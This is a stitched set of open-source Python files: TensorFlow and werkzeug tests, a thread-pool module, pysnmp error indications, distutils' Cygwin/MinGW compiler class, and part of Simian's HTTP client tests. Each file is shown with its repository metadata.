distribution not scalar"): self._cls()( distribution=ds.MultivariateNormalDiag(loc=[[0.]], scale_diag=[[1.]]), bijector=bs.Affine(shift=self._shift, scale_tril=self._tril), batch_shape=[2], event_shape=[3], validate_args=True) if __name__ == "__main__": test.main()
apache-2.0
niieani/rethinkdb
test/rql_test/connections/http_support/werkzeug/testsuite/compat.py
146
1117
# -*- coding: utf-8 -*- """ werkzeug.testsuite.compat ~~~~~~~~~~~~~~~~~~~~~~~~~ Ensure that old stuff does not break on update. :copyright: (c) 2014 by Armin Ronacher. :license: BSD, see LICENSE for more details. """ import unittest import warnings from werkzeug.testsuite import WerkzeugTestCase from werkzeug.wrappers import Response from werkzeug.test import create_environ class CompatTestCase(WerkzeugTestCase): def test_old_imports(self): from werkzeug.utils import Headers, MultiDict, CombinedMultiDict, \ Headers, EnvironHeaders from werkzeug.http import Accept, MIMEAccept, CharsetAccept, \ LanguageAccept, ETags, HeaderSet, WWWAuthenticate, \ Authorization def test_exposed_werkzeug_mod(self): import werkzeug for key in werkzeug.__all__: # deprecated, skip it if key in ('templates', 'Template'): continue getattr(werkzeug, key) def suite(): suite = unittest.TestSuite() suite.addTest(unittest.makeSuite(CompatTestCase)) return suite
agpl-3.0
bwesterb/mirte
src/threadPool.py
1
5025
from mirte.core import Module from six.moves import range import logging import threading try: import prctl except ImportError: prctl = None class ThreadPool(Module): class Worker(threading.Thread): def __init__(self, pool, l): self._name = None threading.Thread.__init__(self) self.l = l self.pool = pool def run(self): self.l.debug("Hello") self.name = '(pristine)' self.pool.cond.acquire() self.pool.actualFT += 1 while True: if not self.pool.running: break if not self.pool.jobs: self.pool.cond.wait() continue job, name = self.pool.jobs.pop() self.name = name self.pool.actualFT -= 1 self.pool.cond.release() try: ret = job() except Exception: self.l.exception("Uncaught exception") ret = True # delete job. Otherwise job will stay alive # while we wait on self.pool.cond del(job) self.pool.cond.acquire() self.name = '(free)' self.pool.actualFT += 1 self.pool.expectedFT += 1 if not ret: break self.pool.actualFT -= 1 self.pool.expectedFT -= 1 self.pool.workers.remove(self) self.pool.cond.release() self.l.debug("Bye (%s)" % self.name) @property def name(self): return self._name @name.setter def name(self, value): self._name = value if prctl: if value: prctl.set_name(value) else: prctl.set_name('(no name)') def __init__(self, *args, **kwargs): super(ThreadPool, self).__init__(*args, **kwargs) self.running = True self.jobs = list() self.cond = threading.Condition() self.mcond = threading.Condition() self.actualFT = 0 # actual number of free threads self.expectedFT = 0 # expected number of free threads self.expectedT = 0 # expected number of threads self.ncreated = 0 # total number of threads created self.workers = set() def _remove_worker(self): self._queue(lambda: False, False) self.expectedT -= 1 def _create_worker(self): self.ncreated += 1 self.expectedFT += 1 self.expectedT += 1 n = self.ncreated l = logging.LoggerAdapter(self.l, {'sid': n}) t = ThreadPool.Worker(self, l) self.workers.add(t) t.start() def start(self): self.main_thread = threading.Thread(target=self.run) self.main_thread.start() def run(self): self.mcond.acquire() while self.running: self.cond.acquire() gotoSleep = False tc = max(self.minFree - self.expectedFT + len(self.jobs), self.min - self.expectedT) td = min(self.expectedFT - len(self.jobs) - self.maxFree, self.expectedT - self.min) if tc > 0: for i in range(tc): self._create_worker() elif td > 0: for i in range(td): self._remove_worker() else: gotoSleep = True self.cond.release() if gotoSleep: self.mcond.wait() self.l.info("Waking and joining all workers") with self.cond: self.cond.notifyAll() workers = list(self.workers) self.mcond.release() for worker in workers: while True: worker.join(1) if not worker.isAlive(): break self.l.warn("Still waiting on %s" % worker) self.l.info(" joined") def stop(self): self.running = False with self.mcond: self.mcond.notify() def _queue(self, raw, name=None): if self.actualFT == 0: self.l.warn("No actual free threads, yet " + "(increase threadPool.minFree)") self.jobs.append((raw, name)) self.expectedFT -= 1 self.cond.notify() self.mcond.notify() def execute_named(self, function, name=None, *args, **kwargs): def _entry(): function(*args, **kwargs) return True with self.mcond: with self.cond: self._queue(_entry, name) def execute(self, function, *args, **kwargs): self.execute_named(function, None, *args, **kwargs) def join(self): self.main_thread.join() # vim: et:sta:bs=2:sw=4:
agpl-3.0
ww9rivers/pysnmp
pysnmp/proto/errind.py
4
5505
# # This file is part of pysnmp software. # # Copyright (c) 2005-2016, Ilya Etingof <[email protected]> # License: http://pysnmp.sf.net/license.html # class ErrorIndication: """SNMPv3 error-indication values""" def __init__(self, descr=None): self.__value = self.__descr = self.__class__.__name__[0].lower() + self.__class__.__name__[1:] if descr: self.__descr = descr def __eq__(self, other): return self.__value == other def __ne__(self, other): return self.__value != other def __lt__(self, other): return self.__value < other def __le__(self, other): return self.__value <= other def __gt__(self, other): return self.__value > other def __ge__(self, other): return self.__value >= other def __str__(self): return self.__descr # SNMP message processing errors class SerializationError(ErrorIndication): pass serializationError = SerializationError('SNMP message serialization error') class DeserializationError(ErrorIndication): pass deserializationError = DeserializationError('SNMP message deserialization error') class ParseError(DeserializationError): pass parseError = ParseError('SNMP message deserialization error') class UnsupportedMsgProcessingModel(ErrorIndication): pass unsupportedMsgProcessingModel = UnsupportedMsgProcessingModel('Unknown SNMP message processing model ID encountered') class UnknownPDUHandler(ErrorIndication): pass unknownPDUHandler = UnknownPDUHandler('Unhandled PDU type encountered') class UnsupportedPDUtype(ErrorIndication): pass unsupportedPDUtype = UnsupportedPDUtype('Unsupported SNMP PDU type encountered') class RequestTimedOut(ErrorIndication): pass requestTimedOut = RequestTimedOut('No SNMP response received before timeout') class EmptyResponse(ErrorIndication): pass emptyResponse = EmptyResponse('Empty SNMP response message') class NonReportable(ErrorIndication): pass nonReportable = NonReportable('Report PDU generation not attempted') class DataMismatch(ErrorIndication): pass dataMismatch = DataMismatch('SNMP request/response parameters mismatched') class EngineIDMismatch(ErrorIndication): pass engineIDMismatch = EngineIDMismatch('SNMP engine ID mismatch encountered') class UnknownEngineID(ErrorIndication): pass unknownEngineID = UnknownEngineID('Unknown SNMP engine ID encountered') class TooBig(ErrorIndication): pass tooBig = TooBig('SNMP message will be too big') class LoopTerminated(ErrorIndication): pass loopTerminated = LoopTerminated('Infinite SNMP entities talk terminated') class InvalidMsg(ErrorIndication): pass invalidMsg = InvalidMsg('Invalid SNMP message header parameters encountered') # SNMP security modules errors class UnknownCommunityName(ErrorIndication): pass unknownCommunityName = UnknownCommunityName('Unknown SNMP community name encountered') class NoEncryption(ErrorIndication): pass noEncryption = NoEncryption('No encryption services configured') class EncryptionError(ErrorIndication): pass encryptionError = EncryptionError('Ciphering services not available') class DecryptionError(ErrorIndication): pass decryptionError = DecryptionError('Ciphering services not available or ciphertext is broken') class NoAuthentication(ErrorIndication): pass noAuthentication = NoAuthentication('No authentication services configured') class AuthenticationError(ErrorIndication): pass authenticationError = AuthenticationError('Ciphering services not available or bad parameters') class AuthenticationFailure(ErrorIndication): pass authenticationFailure = AuthenticationFailure('Authenticator mismatched') class UnsupportedAuthProtocol(ErrorIndication): pass unsupportedAuthProtocol = UnsupportedAuthProtocol('Authentication protocol is not supprted') class UnsupportedPrivProtocol(ErrorIndication): pass unsupportedPrivProtocol = UnsupportedPrivProtocol('Privacy protocol is not supprted') class UnknownSecurityName(ErrorIndication): pass unknownSecurityName = UnknownSecurityName('Unknown SNMP security name encountered') class UnsupportedSecurityModel(ErrorIndication): pass unsupportedSecurityModel = UnsupportedSecurityModel('Unsupported SNMP security model') class UnsupportedSecurityLevel(ErrorIndication): pass unsupportedSecurityLevel = UnsupportedSecurityLevel('Unsupported SNMP security level') class NotInTimeWindow(ErrorIndication): pass notInTimeWindow = NotInTimeWindow('SNMP message timing parameters not in windows of trust') # SNMP access-control errors class NoSuchView(ErrorIndication): pass noSuchView = NoSuchView('No such MIB view currently exists') class NoAccessEntry(ErrorIndication): pass noAccessEntry = NoAccessEntry('Access to MIB node denined') class NoGroupName(ErrorIndication): pass noGroupName = NoGroupName('No such VACM group configured') class NoSuchContext(ErrorIndication): pass noSuchContext = NoSuchContext('SNMP context now found') class NotInView(ErrorIndication): pass notInView = NotInView('Requested OID is out of MIB view') class AccessAllowed(ErrorIndication): pass accessAllowed = AccessAllowed() class OtherError(ErrorIndication): pass otherError = OtherError('Unspecified SNMP engine error occurred') # SNMP Apps errors class OidNotIncreasing(ErrorIndication): pass oidNotIncreasing = OidNotIncreasing('OIDs are not increasing')
bsd-2-clause
vlachoudis/sl4a
python/src/Lib/distutils/cygwinccompiler.py
50
17299
"""distutils.cygwinccompiler Provides the CygwinCCompiler class, a subclass of UnixCCompiler that handles the Cygwin port of the GNU C compiler to Windows. It also contains the Mingw32CCompiler class which handles the mingw32 port of GCC (same as cygwin in no-cygwin mode). """ # problems: # # * if you use a msvc compiled python version (1.5.2) # 1. you have to insert a __GNUC__ section in its config.h # 2. you have to generate a import library for its dll # - create a def-file for python??.dll # - create a import library using # dlltool --dllname python15.dll --def python15.def \ # --output-lib libpython15.a # # see also http://starship.python.net/crew/kernr/mingw32/Notes.html # # * We put export_symbols in a def-file, and don't use # --export-all-symbols because it doesn't worked reliable in some # tested configurations. And because other windows compilers also # need their symbols specified this no serious problem. # # tested configurations: # # * cygwin gcc 2.91.57/ld 2.9.4/dllwrap 0.2.4 works # (after patching python's config.h and for C++ some other include files) # see also http://starship.python.net/crew/kernr/mingw32/Notes.html # * mingw32 gcc 2.95.2/ld 2.9.4/dllwrap 0.2.4 works # (ld doesn't support -shared, so we use dllwrap) # * cygwin gcc 2.95.2/ld 2.10.90/dllwrap 2.10.90 works now # - its dllwrap doesn't work, there is a bug in binutils 2.10.90 # see also http://sources.redhat.com/ml/cygwin/2000-06/msg01274.html # - using gcc -mdll instead dllwrap doesn't work without -static because # it tries to link against dlls instead their import libraries. (If # it finds the dll first.) # By specifying -static we force ld to link against the import libraries, # this is windows standard and there are normally not the necessary symbols # in the dlls. # *** only the version of June 2000 shows these problems # * cygwin gcc 3.2/ld 2.13.90 works # (ld supports -shared) # * mingw gcc 3.2/ld 2.13 works # (ld supports -shared) # This module should be kept compatible with Python 2.1. __revision__ = "$Id: cygwinccompiler.py 65834 2008-08-18 19:23:47Z amaury.forgeotdarc $" import os,sys,copy from distutils.ccompiler import gen_preprocess_options, gen_lib_options from distutils.unixccompiler import UnixCCompiler from distutils.file_util import write_file from distutils.errors import DistutilsExecError, CompileError, UnknownFileError from distutils import log def get_msvcr(): """Include the appropriate MSVC runtime library if Python was built with MSVC 7.0 or later. """ msc_pos = sys.version.find('MSC v.') if msc_pos != -1: msc_ver = sys.version[msc_pos+6:msc_pos+10] if msc_ver == '1300': # MSVC 7.0 return ['msvcr70'] elif msc_ver == '1310': # MSVC 7.1 return ['msvcr71'] elif msc_ver == '1400': # VS2005 / MSVC 8.0 return ['msvcr80'] elif msc_ver == '1500': # VS2008 / MSVC 9.0 return ['msvcr90'] else: raise ValueError("Unknown MS Compiler version %i " % msc_Ver) class CygwinCCompiler (UnixCCompiler): compiler_type = 'cygwin' obj_extension = ".o" static_lib_extension = ".a" shared_lib_extension = ".dll" static_lib_format = "lib%s%s" shared_lib_format = "%s%s" exe_extension = ".exe" def __init__ (self, verbose=0, dry_run=0, force=0): UnixCCompiler.__init__ (self, verbose, dry_run, force) (status, details) = check_config_h() self.debug_print("Python's GCC status: %s (details: %s)" % (status, details)) if status is not CONFIG_H_OK: self.warn( "Python's pyconfig.h doesn't seem to support your compiler. " "Reason: %s. " "Compiling may fail because of undefined preprocessor macros." % details) self.gcc_version, self.ld_version, self.dllwrap_version = \ get_versions() self.debug_print(self.compiler_type + ": gcc %s, ld %s, dllwrap %s\n" % (self.gcc_version, self.ld_version, self.dllwrap_version) ) # ld_version >= "2.10.90" and < "2.13" should also be able to use # gcc -mdll instead of dllwrap # Older dllwraps had own version numbers, newer ones use the # same as the rest of binutils ( also ld ) # dllwrap 2.10.90 is buggy if self.ld_version >= "2.10.90": self.linker_dll = "gcc" else: self.linker_dll = "dllwrap" # ld_version >= "2.13" support -shared so use it instead of # -mdll -static if self.ld_version >= "2.13": shared_option = "-shared" else: shared_option = "-mdll -static" # Hard-code GCC because that's what this is all about. # XXX optimization, warnings etc. should be customizable. self.set_executables(compiler='gcc -mcygwin -O -Wall', compiler_so='gcc -mcygwin -mdll -O -Wall', compiler_cxx='g++ -mcygwin -O -Wall', linker_exe='gcc -mcygwin', linker_so=('%s -mcygwin %s' % (self.linker_dll, shared_option))) # cygwin and mingw32 need different sets of libraries if self.gcc_version == "2.91.57": # cygwin shouldn't need msvcrt, but without the dlls will crash # (gcc version 2.91.57) -- perhaps something about initialization self.dll_libraries=["msvcrt"] self.warn( "Consider upgrading to a newer version of gcc") else: # Include the appropriate MSVC runtime library if Python was built # with MSVC 7.0 or later. self.dll_libraries = get_msvcr() # __init__ () def _compile(self, obj, src, ext, cc_args, extra_postargs, pp_opts): if ext == '.rc' or ext == '.res': # gcc needs '.res' and '.rc' compiled to object files !!! try: self.spawn(["windres", "-i", src, "-o", obj]) except DistutilsExecError, msg: raise CompileError, msg else: # for other files use the C-compiler try: self.spawn(self.compiler_so + cc_args + [src, '-o', obj] + extra_postargs) except DistutilsExecError, msg: raise CompileError, msg def link (self, target_desc, objects, output_filename, output_dir=None, libraries=None, library_dirs=None, runtime_library_dirs=None, export_symbols=None, debug=0, extra_preargs=None, extra_postargs=None, build_temp=None, target_lang=None): # use separate copies, so we can modify the lists extra_preargs = copy.copy(extra_preargs or []) libraries = copy.copy(libraries or []) objects = copy.copy(objects or []) # Additional libraries libraries.extend(self.dll_libraries) # handle export symbols by creating a def-file # with executables this only works with gcc/ld as linker if ((export_symbols is not None) and (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")): # (The linker doesn't do anything if output is up-to-date. # So it would probably better to check if we really need this, # but for this we had to insert some unchanged parts of # UnixCCompiler, and this is not what we want.) # we want to put some files in the same directory as the # object files are, build_temp doesn't help much # where are the object files temp_dir = os.path.dirname(objects[0]) # name of dll to give the helper files the same base name (dll_name, dll_extension) = os.path.splitext( os.path.basename(output_filename)) # generate the filenames for these files def_file = os.path.join(temp_dir, dll_name + ".def") lib_file = os.path.join(temp_dir, 'lib' + dll_name + ".a") # Generate .def file contents = [ "LIBRARY %s" % os.path.basename(output_filename), "EXPORTS"] for sym in export_symbols: contents.append(sym) self.execute(write_file, (def_file, contents), "writing %s" % def_file) # next add options for def-file and to creating import libraries # dllwrap uses different options than gcc/ld if self.linker_dll == "dllwrap": extra_preargs.extend(["--output-lib", lib_file]) # for dllwrap we have to use a special option extra_preargs.extend(["--def", def_file]) # we use gcc/ld here and can be sure ld is >= 2.9.10 else: # doesn't work: bfd_close build\...\libfoo.a: Invalid operation #extra_preargs.extend(["-Wl,--out-implib,%s" % lib_file]) # for gcc/ld the def-file is specified as any object files objects.append(def_file) #end: if ((export_symbols is not None) and # (target_desc != self.EXECUTABLE or self.linker_dll == "gcc")): # who wants symbols and a many times larger output file # should explicitly switch the debug mode on # otherwise we let dllwrap/ld strip the output file # (On my machine: 10KB < stripped_file < ??100KB # unstripped_file = stripped_file + XXX KB # ( XXX=254 for a typical python extension)) if not debug: extra_preargs.append("-s") UnixCCompiler.link(self, target_desc, objects, output_filename, output_dir, libraries, library_dirs, runtime_library_dirs, None, # export_symbols, we do this in our def-file debug, extra_preargs, extra_postargs, build_temp, target_lang) # link () # -- Miscellaneous methods ----------------------------------------- # overwrite the one from CCompiler to support rc and res-files def object_filenames (self, source_filenames, strip_dir=0, output_dir=''): if output_dir is None: output_dir = '' obj_names = [] for src_name in source_filenames: # use normcase to make sure '.rc' is really '.rc' and not '.RC' (base, ext) = os.path.splitext (os.path.normcase(src_name)) if ext not in (self.src_extensions + ['.rc','.res']): raise UnknownFileError, \ "unknown file type '%s' (from '%s')" % \ (ext, src_name) if strip_dir: base = os.path.basename (base) if ext == '.res' or ext == '.rc': # these need to be compiled to object files obj_names.append (os.path.join (output_dir, base + ext + self.obj_extension)) else: obj_names.append (os.path.join (output_dir, base + self.obj_extension)) return obj_names # object_filenames () # class CygwinCCompiler # the same as cygwin plus some additional parameters class Mingw32CCompiler (CygwinCCompiler): compiler_type = 'mingw32' def __init__ (self, verbose=0, dry_run=0, force=0): CygwinCCompiler.__init__ (self, verbose, dry_run, force) # ld_version >= "2.13" support -shared so use it instead of # -mdll -static if self.ld_version >= "2.13": shared_option = "-shared" else: shared_option = "-mdll -static" # A real mingw32 doesn't need to specify a different entry point, # but cygwin 2.91.57 in no-cygwin-mode needs it. if self.gcc_version <= "2.91.57": entry_point = '--entry _DllMain@12' else: entry_point = '' self.set_executables(compiler='gcc -mno-cygwin -O -Wall', compiler_so='gcc -mno-cygwin -mdll -O -Wall', compiler_cxx='g++ -mno-cygwin -O -Wall', linker_exe='gcc -mno-cygwin', linker_so='%s -mno-cygwin %s %s' % (self.linker_dll, shared_option, entry_point)) # Maybe we should also append -mthreads, but then the finished # dlls need another dll (mingwm10.dll see Mingw32 docs) # (-mthreads: Support thread-safe exception handling on `Mingw32') # no additional libraries needed self.dll_libraries=[] # Include the appropriate MSVC runtime library if Python was built # with MSVC 7.0 or later. self.dll_libraries = get_msvcr() # __init__ () # class Mingw32CCompiler # Because these compilers aren't configured in Python's pyconfig.h file by # default, we should at least warn the user if he is using a unmodified # version. CONFIG_H_OK = "ok" CONFIG_H_NOTOK = "not ok" CONFIG_H_UNCERTAIN = "uncertain" def check_config_h(): """Check if the current Python installation (specifically, pyconfig.h) appears amenable to building extensions with GCC. Returns a tuple (status, details), where 'status' is one of the following constants: CONFIG_H_OK all is well, go ahead and compile CONFIG_H_NOTOK doesn't look good CONFIG_H_UNCERTAIN not sure -- unable to read pyconfig.h 'details' is a human-readable string explaining the situation. Note there are two ways to conclude "OK": either 'sys.version' contains the string "GCC" (implying that this Python was built with GCC), or the installed "pyconfig.h" contains the string "__GNUC__". """ # XXX since this function also checks sys.version, it's not strictly a # "pyconfig.h" check -- should probably be renamed... from distutils import sysconfig import string # if sys.version contains GCC then python was compiled with # GCC, and the pyconfig.h file should be OK if string.find(sys.version,"GCC") >= 0: return (CONFIG_H_OK, "sys.version mentions 'GCC'") fn = sysconfig.get_config_h_filename() try: # It would probably better to read single lines to search. # But we do this only once, and it is fast enough f = open(fn) s = f.read() f.close() except IOError, exc: # if we can't read this file, we cannot say it is wrong # the compiler will complain later about this file as missing return (CONFIG_H_UNCERTAIN, "couldn't read '%s': %s" % (fn, exc.strerror)) else: # "pyconfig.h" contains an "#ifdef __GNUC__" or something similar if string.find(s,"__GNUC__") >= 0: return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn) else: return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn) def get_versions(): """ Try to find out the versions of gcc, ld and dllwrap. If not possible it returns None for it. """ from distutils.version import LooseVersion from distutils.spawn import find_executable import re gcc_exe = find_executable('gcc') if gcc_exe: out = os.popen(gcc_exe + ' -dumpversion','r') out_string = out.read() out.close() result = re.search('(\d+\.\d+(\.\d+)*)',out_string) if result: gcc_version = LooseVersion(result.group(1)) else: gcc_version = None else: gcc_version = None ld_exe = find_executable('ld') if ld_exe: out = os.popen(ld_exe + ' -v','r') out_string = out.read() out.close() result = re.search('(\d+\.\d+(\.\d+)*)',out_string) if result: ld_version = LooseVersion(result.group(1)) else: ld_version = None else: ld_version = None dllwrap_exe = find_executable('dllwrap') if dllwrap_exe: out = os.popen(dllwrap_exe + ' --version','r') out_string = out.read() out.close() result = re.search(' (\d+\.\d+(\.\d+)*)',out_string) if result: dllwrap_version = LooseVersion(result.group(1)) else: dllwrap_version = None else: dllwrap_version = None return (gcc_version, ld_version, dllwrap_version)
apache-2.0
googlearchive/simian
src/tests/simian/client/client_test.py
1
41740
#!/usr/bin/env python # # Copyright 2018 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """client module tests.""" import httplib import logging import sys from pyfakefs import fake_filesystem import M2Crypto import mock import stubout from google.apputils import app from google.apputils import basetest from simian import auth from simian.client import client class ClientModuleTest(basetest.TestCase): """Test the client module.""" def testConstants(self): for a in [ 'SERVER_HOSTNAME', 'SERVER_PORT', 'AUTH_DOMAIN', 'CLIENT_SSL_PATH', 'SEEK_SET', 'SEEK_CUR', 'SEEK_END', 'DEBUG', 'URL_UPLOADPKG']: self.assertTrue(hasattr(client, a)) class MultiBodyConnectionTest(basetest.TestCase): """Test MultiBodyConnection class.""" def setUp(self): super(MultiBodyConnectionTest, self).setUp() self.stubs = stubout.StubOutForTesting() self.mbc = client.MultiBodyConnection() def tearDown(self): super(MultiBodyConnectionTest, self).tearDown() self.stubs.UnsetAll() def testSetProgressCallback(self): """Test SetProgressCallback().""" fn = lambda x: 1 self.assertFalse(hasattr(self.mbc, '_progress_callback')) self.mbc.SetProgressCallback(fn) self.assertEqual(self.mbc._progress_callback, fn) self.assertRaises( client.Error, self.mbc.SetProgressCallback, 1) def testProgressCallback(self): """Test _ProgressCallback().""" self.mbc._ProgressCallback(1, 2) self.mbc._progress_callback = mock.Mock() self.mbc._ProgressCallback(1, 2) self.mbc._progress_callback.assert_called_with(1, 2) @mock.patch.object(client.httplib.HTTPConnection, 'request') def testRequest(self, mock_request): """Test request().""" fs = fake_filesystem.FakeFilesystem() fake_os = fake_filesystem.FakeOsModule(fs) fake_open = fake_filesystem.FakeFileOpen(fs) file_name = '/f1' file_size = 10000 f_body = 'x' * file_size fs.CreateFile(file_name, contents=f_body) fake_file = fake_open(file_name, 'r') self.stubs.Set(client, 'os', fake_os) method = 'GET' url = '/foo' body = ['hello', fake_file] content_length = len(body[0]) + file_size headers = { 'Content-Length': content_length, } self.mbc._is_https = False self.mbc.send = mock.Mock() self.mbc._ProgressCallback = mock.Mock() inorder_calls = mock.Mock() inorder_calls.attach_mock(mock_request, 'request') inorder_calls.attach_mock(self.mbc.send, 'send') inorder_calls.attach_mock(self.mbc._ProgressCallback, '_ProgressCallback') self.mbc.request(method, url, body=body) inorder_calls.assert_has_calls([ mock.call.request(self.mbc, method, url, headers=headers), mock.call._ProgressCallback(0, content_length), mock.call.send(body[0]), mock.call._ProgressCallback(len(body[0]), content_length), mock.call.send(f_body[:8192]), mock.call._ProgressCallback(len(body[0]) + 8192, content_length), mock.call.send(f_body[8192:]), mock.call._ProgressCallback(len(body[0]) + file_size, content_length), mock.call._ProgressCallback(len(body[0]) + file_size, content_length)]) class HTTPSMultiBodyConnectionTest(basetest.TestCase): def setUp(self): self.stubs = stubout.StubOutForTesting() self.hostname = 'foohost' self.mbc = client.HTTPSMultiBodyConnection(self.hostname) def tearDown(self): self.stubs.UnsetAll() def testParentClassRequestAssumption(self): """Test assumptions of parent class request().""" method = 'GET' url = '/foo' body = None headers = {} with mock.patch.object( client.httplib.HTTPConnection, '_send_request', return_value=-1) as mock_fn: c = client.httplib.HTTPConnection(self.hostname) self.assertEqual(None, c.request(method, url)) mock_fn.assert_called_once_with(method, url, body, headers) @mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True) @mock.patch.object(client.httplib.HTTPConnection, 'endheaders') @mock.patch.object(client.httplib.HTTPConnection, 'putheader') @mock.patch.object(client.httplib.HTTPConnection, 'putrequest') def testParentClassSendRequestAssumptionEmptyBody( self, putrequest_mock, putheader_mock, endheaders_mock, send_mock): """Test assumptions of parent class _send_request().""" method = 'GET' url = '/foo' body1 = None headers = {'foo': 'bar'} inorder_calls = mock.Mock() inorder_calls.attach_mock(putrequest_mock, 'putrequest') inorder_calls.attach_mock(putheader_mock, 'putheader') inorder_calls.attach_mock(endheaders_mock, 'endheaders') inorder_calls.attach_mock(send_mock, 'send') # with a None body supplied, send() is never called. on >=2.7 # endheaders is still called with the body contents, even if they # are None. c = client.httplib.HTTPConnection(self.hostname) c._send_request(method, url, body1, headers) expected = [ mock.call.putrequest(method, url), mock.call.putheader('foo', headers['foo']) ] if sys.version_info[0] >= 2 and sys.version_info[1] >= 7: expected.append(mock.call.endheaders(body1)) else: expected.append(mock.call.endheaders()) inorder_calls.assert_has_calls(expected) @mock.patch.object(client.httplib.HTTPConnection, 'send', autospec=True) @mock.patch.object(client.httplib.HTTPConnection, 'endheaders') @mock.patch.object(client.httplib.HTTPConnection, 'putheader') @mock.patch.object(client.httplib.HTTPConnection, 'putrequest') def testParentClassSendRequestAssumption( self, putrequest_mock, putheader_mock, endheaders_mock, send_mock): """Test assumptions of parent class _send_request().""" method = 'GET' url = '/foo' body2 = 'howdy' headers = {'foo': 'bar'} inorder_calls = mock.Mock() inorder_calls.attach_mock(putrequest_mock, 'putrequest') inorder_calls.attach_mock(putheader_mock, 'putheader') inorder_calls.attach_mock(endheaders_mock, 'endheaders') inorder_calls.attach_mock(send_mock, 'send') # with a body supplied, send() is called inside _send_request() on # httplib < 2.6. in >=2.7 endheaders() sends the body and headers # all at once. expected = [ mock.call.putrequest(method, url), mock.call.putheader('Content-Length', str(len(body2))), mock.call.putheader('foo', headers['foo']) ] if sys.version_info[0] >= 2 and sys.version_info[1] >= 7: expected.append(mock.call.endheaders(body2)) else: expected.append(mock.call.endheaders()) expected.append(mock.send(body2)) c = client.httplib.HTTPConnection(self.hostname) c._send_request(method, url, body2, headers) inorder_calls.assert_has_calls(expected) def testDirectSendTypes(self): """Test the DIRECT_SEND_TYPES constant for sane values.""" self.assertTrue(type(self.mbc.DIRECT_SEND_TYPES) is list) @mock.patch.object(client.httplib.HTTPConnection, 'request') @mock.patch.object(client.httplib.HTTPConnection, 'send') def testRequestSimple(self, mock_send, mock_request): """Test request with one body element.""" method = 'GET' url = '/foo' body = 'hello' headers = { 'Content-Length': len(body), 'Host': self.hostname, } self.mbc.request(method, url, body=body) mock_request.assert_called_once_with( self.mbc, method, url, headers=headers) mock_send.assert_called_once_with(body) @mock.patch.object(client.httplib.HTTPConnection, 'request') @mock.patch.object(client.httplib.HTTPConnection, 'send') def testRequestMultiString(self, send_mock, request_mock): """Test request() with multiple body string elements.""" method = 'GET' url = '/foo' body = ['hello', 'there'] headers = { 'Content-Length': sum(map(len, body)), 'Host': self.hostname, } for s in body: client.httplib.HTTPConnection.send(s).AndReturn(None) self.mbc.request(method, url, body=body) request_mock.assert_called_once_with(self.mbc, method, url, headers=headers) send_mock.assert_has_calls([mock.call(x) for x in body]) @mock.patch.object(client.httplib.HTTPConnection, 'send') @mock.patch.object(client.httplib.HTTPConnection, 'request') def testRequestMultiMixed(self, request_mock, send_mock): """Test request() with multiple mixed body elements.""" filepath = '/somefilename' f_body = 'there' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(filepath, contents=f_body) fake_open = fake_filesystem.FakeFileOpen(fs) f = fake_open(filepath) method = 'GET' url = '/foo' body = ['hello', f] content_length = len(body[0]) + len(f_body) headers = { 'Content-Length': content_length, 'Host': self.hostname, } self.mbc.request(method, url, body=body) request_mock.assert_called_once_with(self.mbc, method, url, headers=headers) self.assertEqual(2, send_mock.call_count) send_mock.assert_has_calls([mock.call(body[0]), mock.call(f_body)]) def testSetCACertChain(self): """Test SetCACertChain().""" self.mbc.SetCACertChain('foo') self.assertEqual(self.mbc._ca_cert_chain, 'foo') def testIsValidCert(self): """Test _IsValidCert().""" self.assertEqual(1, self.mbc._IsValidCert(1, 1)) def testIsValidCertOkZero(self): """Test _IsValidCert().""" cert = mock.create_autospec(M2Crypto.X509.X509) cert_subject = mock.create_autospec(M2Crypto.X509.X509_Name) store = mock.create_autospec(M2Crypto.X509.X509_Store_Context) store.get_current_cert.return_value = cert cert.get_subject.return_value = cert_subject cert_subject.__str__.return_value = 'valid' self.assertEqual(0, self.mbc._IsValidCert(0, store)) cert_subject.__str__.assert_called() @mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True) def testLoadCACertChain(self, named_temporary_file_mock): """Test _LoadCACertChain().""" temp_filepath = '/tmp/somefilename' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(temp_filepath) fake_open = fake_filesystem.FakeFileOpen(fs) tf = fake_open(temp_filepath, 'w') named_temporary_file_mock.return_value = tf ctx = mock.create_autospec(M2Crypto.SSL.Context) ctx.load_verify_locations.return_value = 1 cert_chain = 'cert chain la la ..' self.mbc._ca_cert_chain = cert_chain self.mbc._LoadCACertChain(ctx) self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read()) # mock 2.0.0 incorrectly binds spec to calls ctx._spec_signature = None ctx.assert_has_calls([ mock.call.load_verify_locations(cafile=tf.name), mock.call.set_verify( client.SSL.verify_peer | client.SSL.verify_fail_if_no_peer_cert, depth=9, callback=self.mbc._IsValidCert)]) @mock.patch.object(client.tempfile, 'NamedTemporaryFile', autospec=True) def testLoadCACertChainWhenLoadError(self, named_temporary_file_mock): """Test _LoadCACertChain().""" temp_filepath = '/tmp/somefilename' fs = fake_filesystem.FakeFilesystem() fs.CreateFile(temp_filepath) fake_open = fake_filesystem.FakeFileOpen(fs) tf = fake_open(temp_filepath, 'w') named_temporary_file_mock.return_value = tf cert_chain = 'cert chain la la ..' self.mbc._ca_cert_chain = cert_chain ctx = mock.create_autospec(M2Crypto.SSL.Context) self.assertRaises( client.SimianClientError, self.mbc._LoadCACertChain, ctx) ctx.load_verify_locations.assert_called_once_with(cafile=tf.name) self.assertEqual(cert_chain, fake_open(temp_filepath, 'r').read()) def testLoadCACertChainWhenNone(self): """Test _LoadCACertChain().""" self.assertRaises( client.SimianClientError, self.mbc._LoadCACertChain, mock.MagicMock()) @mock.patch.object(client.SSL, 'Context', autospec=True) @mock.patch.object(client.SSL, 'Connection', autospec=True) def testConnect(self, connection_mock, context_mock): """Test connect().""" context = context_mock() conn = connection_mock(context) connection_mock.reset_mock() context_mock.reset_mock() 